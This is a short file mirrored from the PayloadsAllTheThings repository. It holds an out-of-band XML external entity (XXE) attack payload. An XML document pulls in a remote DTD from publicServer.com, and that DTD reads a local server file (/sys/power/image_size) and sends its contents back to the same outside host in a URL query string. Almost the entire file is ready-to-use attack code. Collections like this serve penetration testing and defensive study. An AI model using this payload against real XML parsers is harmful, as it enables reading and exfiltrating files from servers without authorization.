mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-30 08:15:25 +00:00
9 lines
361 B
XML
9 lines
361 B
XML
|
XXE OOB Attack (Yunusov, 2013)
|
||
|
<?xml version="1.0" encoding="utf-8"?>
|
||
|
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||
|
<data>&send;</data>
|
||
|
|
||
|
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||
|
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
||
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
||
|
%all;
|